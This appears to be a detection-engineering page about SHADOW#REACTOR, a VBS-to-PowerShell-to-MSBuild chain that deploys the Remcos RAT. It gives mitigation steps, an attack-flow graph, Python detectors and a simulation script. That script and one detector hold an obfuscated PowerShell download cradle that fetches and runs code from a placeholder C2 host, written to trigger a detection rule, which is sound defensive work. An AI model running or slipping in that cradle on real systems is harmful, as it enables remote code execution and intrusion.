SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
SHADOW#REACTOR is a multi-stage Windows malware chain that combines an obfuscated VBS launcher, a PowerShell-based downloader, text-only staging artifacts, a .NET Reactor–protected loader, and MSBuild execution to ultimately deploy the Remcos remote access trojan (RAT).
Investigation
Researchers reconstructed the flow starting with a VBS script retrieved from attacker infrastructure, followed by PowerShell routines that reassemble and decode staged text payloads. The chain proceeds with reflective, in-memory loading of a .NET assembly and a final handoff to MSBuild, which triggers execution of the Remcos RAT. The write-up documents the text-encoded components, decryption logic, and persistence methods used to maintain access.
Mitigation
Increase monitoring coverage for script hosts and interpreters, and prevent VBS/PowerShell execution from user-writable paths where feasible. Add detections for suspicious outbound HTTP traffic to identified infrastructure, MSBuild misuse, and reflective .NET assembly loading. Monitor for common persistence patterns, including Run-key modifications and shortcut-based startup entries.
Response
If SHADOW#REACTOR activity is confirmed, isolate the endpoint and kill the full process chain (wscript.exe → powershell.exe → msbuild.exe). Remove any staged text files and related registry artifacts, and remediate by deleting Remcos binaries and associated configuration blobs. Follow with a thorough forensic review to scope additional compromise and ensure complete eradication.
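The Mitigation and Response sections name two things a hunt can be written against directly: the wscript.exe → powershell.exe → msbuild.exe process chain, and persistence through Run keys or Startup-folder shortcuts. The following is an added example written for this page, not code from the report's authors or from any detection vendor. It walks constructed process-creation records (fields modelled on Sysmon Event ID 1 / Security 4688) to find the chain by parent-PID ancestry and classifies written paths against the persistence locations. All sample PIDs, paths and command lines are constructed.

```python
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon Event ID 1 / Security 4688)."""
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# Constructed sample telemetry: one chain matching the report (wscript -> powershell -> msbuild)
# and one benign MSBuild launch from a developer tool that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(1000, 500, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\Public\update.vbs"'),
    ProcEvent(1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -w hidden -enc <constructed>"),
    ProcEvent(1300, 1200, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\Public\build.proj"),
    ProcEvent(2000, 1000, r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
              "devenv.exe"),
    ProcEvent(2100, 2000, r"C:\Program Files\Microsoft Visual Studio\MSBuild\Current\Bin\MSBuild.exe",
              "MSBuild.exe app.csproj"),
]

# Process chain named in the Response section, parent first.
CHAIN = ("wscript.exe", "powershell.exe", "msbuild.exe")

# Persistence locations named in the Mitigation section (compared case-insensitively).
RUN_KEYS = (r"\software\microsoft\windows\currentversion\run",)  # also covers RunOnce
STARTUP_DIRS = (
    r"\appdata\roaming\microsoft\windows\start menu\programs\startup",
    r"\programdata\microsoft\windows\start menu\programs\startup",
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, usable on any host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def ancestry(events, pid: int, depth: int):
    """Image names from `pid` upward through its parents, child first, at most `depth` entries."""
    by_pid = {e.pid: e for e in events}
    lineage = []
    while pid in by_pid and len(lineage) < depth:
        lineage.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return lineage


def find_chain(events):
    """PIDs of msbuild.exe processes whose parent is powershell.exe and grandparent wscript.exe."""
    hits = []
    for e in events:
        if basename(e.image) != CHAIN[-1]:
            continue
        if tuple(reversed(ancestry(events, e.pid, len(CHAIN)))) == CHAIN:
            hits.append(e.pid)
    return hits


def persistence_kind(target: str):
    """Classify a written registry value path or file path: 'run_key', 'startup_lnk' or None."""
    t = target.lower()
    if any(k in t for k in RUN_KEYS):
        return "run_key"
    if t.endswith(".lnk") and any(d in t for d in STARTUP_DIRS):
        return "startup_lnk"
    return None


if __name__ == "__main__":
    for pid in find_chain(SAMPLE_EVENTS):
        print(f"ALERT wscript->powershell->msbuild chain, msbuild pid {pid}")
```

Matching on the full three-step ancestry rather than on msbuild.exe alone is what keeps the Visual Studio launch in the sample from alerting; in a real pipeline the same function runs over the exported events for one host, keyed by PID within a boot session.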
Attack Flow
graph TB
    %% Class Definitions Section
    classDef technique fill:#ffe699
    classDef builtin fill:#cccccc
    classDef malware fill:#ff9999

    %% Node definitions
    tech_user_execution["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/><b>Description</b>: Victim runs a malicious file that launches code."]
    class tech_user_execution technique
    tool_wscript["<b>Tool</b> – <b>Name</b>: wscript.exe<br/><b>Description</b>: Windows Script Host used to execute VBScript files."]
    class tool_wscript builtin
    tech_vbscript_interp["<b>Technique</b> – <b>T1059.005 Command and Scripting Interpreter: Visual Basic</b><br/><b>Description</b>: Executes Visual Basic scripts on the host system."]
    class tech_vbscript_interp technique
    tech_powershell_interp["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/><b>Description</b>: Runs PowerShell commands and scripts."]
    class tech_powershell_interp technique
    tech_http_comm["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/><b>Description</b>: Uses HTTP/HTTPS to download payload fragments from remote servers."]
    class tech_http_comm technique
    tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Payload is encoded with Base64, XOR and protected by .NET Reactor."]
    class tech_obfuscation technique
    tech_reflective_loading["<b>Technique</b> – <b>T1620 Reflective Code Loading</b> / <b>T1574.014 Hijack Execution Flow: AppDomainManager</b><br/><b>Description</b>: Loads a .NET assembly in memory via AppDomainManager hijacking."]
    class tech_reflective_loading technique
    tool_msbuild["<b>Tool</b> – <b>Name</b>: MSBuild.exe<br/><b>Description</b>: Trusted developer utility abused as a LOLBin to launch the final stage."]
    class tool_msbuild builtin
    malware_remcos["<b>Malware</b> – <b>Name</b>: Remcos RAT<br/><b>Description</b>: Remote access trojan used for command and control."]
    class malware_remcos malware
    tech_shortcut_mod["<b>Technique</b> – <b>T1547.009 Shortcut Modification</b><br/><b>Description</b>: Creates a LNK shortcut in the Startup folder to achieve persistence."]
    class tech_shortcut_mod technique

    %% Connections showing attack flow
    tech_user_execution -->|executes via| tool_wscript
    tool_wscript -->|runs| tech_vbscript_interp
    tech_vbscript_interp -->|invokes| tech_powershell_interp
    tech_powershell_interp -->|downloads fragments via| tech_http_comm
    tech_http_comm -->|reconstructs payload| tech_obfuscation
    tech_obfuscation -->|loads in memory via| tech_reflective_loading
    tech_reflective_loading -->|uses| tool_msbuild
    tool_msbuild -->|launches| malware_remcos
    malware_remcos -->|may create| tech_shortcut_mod
Detections
- LOLBAS WScript / CScript (via process_creation)
- Suspicious Powershell Strings (via powershell)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- Suspicious Files in Public User Profile (via file_event)
- Suspicious Execution from Public User Profile (via process_creation)
- Call Suspicious .NET Methods from Powershell (via powershell)
- IOCs (HashSha256) to detect: SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
- IOCs (SourceIP) to detect: SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
- IOCs (DestinationIP) to detect: SHADOW#REACTOR – TEXT-ONLY STAGING, .NET REACTOR, AND IN-MEMORY REMCOS RAT DEPLOYMENT
- Detection of SHADOW#REACTOR Infection Chain [Windows Process Creation]
- Detection of ExecutionPolicy Bypass and Obfuscated PowerShell Commands [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands:
An attacker with limited lateral movement rights wishes to execute a remote payload on a compromised Windows host while evading typical script-blocking defenses. They use PowerShell with -ExecutionPolicy Bypass to ignore execution policy restrictions. The malicious payload is obfuscated as a Base64-encoded string that, when decoded, creates a System.Net.WebClient object to download a PowerShell script from a C2 server and invoke it. This combination satisfies all three detection criteria (ExecutionPolicy Bypass, FromBase64String, System.Net.WebClient).
- Regression Test Script:
#--------------------------------------------
# Simulated malicious PowerShell execution
#--------------------------------------------
# 1. Craft a simple remote script (for demo only)
$remoteScript = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://{C2_HOST}/payload.ps1")'

# 2. Encode the script in Base64 (UTF-16LE, the encoding PowerShell itself uses for -EncodedCommand)
$bytes = [System.Text.Encoding]::Unicode.GetBytes($remoteScript)
$b64   = [Convert]::ToBase64String($bytes)

# 3. Execute with ExecutionPolicy Bypass and FromBase64String.
#    `$decoded is backtick-escaped so the child process, not this shell, expands it;
#    unescaped, the outer shell would substitute an empty string and the child would fail to parse.
PowerShell -ExecutionPolicy Bypass -Command "`$decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64')); Invoke-Expression `$decoded"
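The narrative states the rule fires on three indicators, but only two of them (ExecutionPolicy Bypass and FromBase64String) appear in the clear on the command line; System.Net.WebClient is hidden inside the Base64 blob. The following is an added example for this page, not the vendor's rule logic: it extracts Base64-looking tokens from a PowerShell command line, decodes them (UTF-16LE first, since that is what `[Text.Encoding]::Unicode` and `-EncodedCommand` produce), and scores the command line plus decoded content against the three indicators. The indicator regexes, the printable-text heuristic and the sample command line are assumptions of this example; `{C2_HOST}` is the page's own placeholder.

```python
import base64
import re

# Candidate Base64 tokens: 16+ alphabet characters so ordinary words are skipped; padding optional.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# The three indicators the narrative names. powershell.exe accepts unambiguous parameter-prefix
# abbreviations (-ep, -exec, ...), so the first pattern tolerates them (assumption of this example).
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I),
    "from_base64_string": re.compile(r"FromBase64String", re.I),
    "net_webclient": re.compile(r"System\.Net\.WebClient", re.I),
}


def _mostly_printable(text: str) -> bool:
    """Heuristic: at least 90% of characters are printable or ordinary whitespace."""
    if not text:
        return False
    ok = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    return ok / len(text) >= 0.9


def _as_text(raw: bytes):
    """Decode raw bytes as UTF-16LE when the high byte of every code unit is (almost always) zero,
    which is how PowerShell's Unicode encoding renders ASCII script; otherwise try UTF-8."""
    if raw and len(raw) % 2 == 0 and raw[1::2].count(0) >= 0.9 * (len(raw) // 2):
        enc = "utf-16-le"
    else:
        enc = "utf-8"
    try:
        text = raw.decode(enc)
    except UnicodeDecodeError:
        return None
    return text if _mostly_printable(text) else None


def decode_blobs(cmdline: str):
    """Every Base64-looking token in the command line that decodes to readable text."""
    out = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = _as_text(raw)
        if text is not None:
            out.append(text)
    return out


def score_command(cmdline: str):
    """Names of the indicators present in the command line or in any decoded Base64 payload."""
    texts = [cmdline] + decode_blobs(cmdline)
    return {name for name, rx in INDICATORS.items() if any(rx.search(t) for t in texts)}


def matches_rule(cmdline: str) -> bool:
    """True when all three indicators are present, the condition the narrative describes."""
    return score_command(cmdline) == set(INDICATORS)


def build_sample_cmdline() -> str:
    """Constructed process command line with the shape of the regression script above."""
    inner = ('Invoke-Expression (New-Object System.Net.WebClient)'
             '.DownloadString("http://{C2_HOST}/payload.ps1")')
    b64 = base64.b64encode(inner.encode("utf-16-le")).decode("ascii")
    return ('powershell.exe -ExecutionPolicy Bypass -Command "$decoded = '
            "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
            + b64 + "')); Invoke-Expression $decoded\"")


if __name__ == "__main__":
    sample = build_sample_cmdline()
    print("indicators:", sorted(score_command(sample)), "rule fires:", matches_rule(sample))
```

Scoring the decoded payload together with the raw command line is the point: a rule that inspects only the process-creation command line sees two of the three indicators and must lean on script-block logging (Event ID 4104) for the third, whereas decoding the blob at detection time recovers it from process telemetry alone.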
- Cleanup Commands:
# Stop lingering PowerShell processes started with ExecutionPolicy Bypass.
# Get-Process cannot read other processes' command lines (StartInfo.Arguments is empty
# for them), so the command line is taken from Win32_Process instead.
Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
    Where-Object { $_.CommandLine -match 'ExecutionPolicy Bypass' } |
    ForEach-Object { Stop-Process -Id $_.ProcessId -Force }
# Remove any downloaded payloads
Remove-Item -Path "C:\Temp\payload.ps1" -ErrorAction SilentlyContinue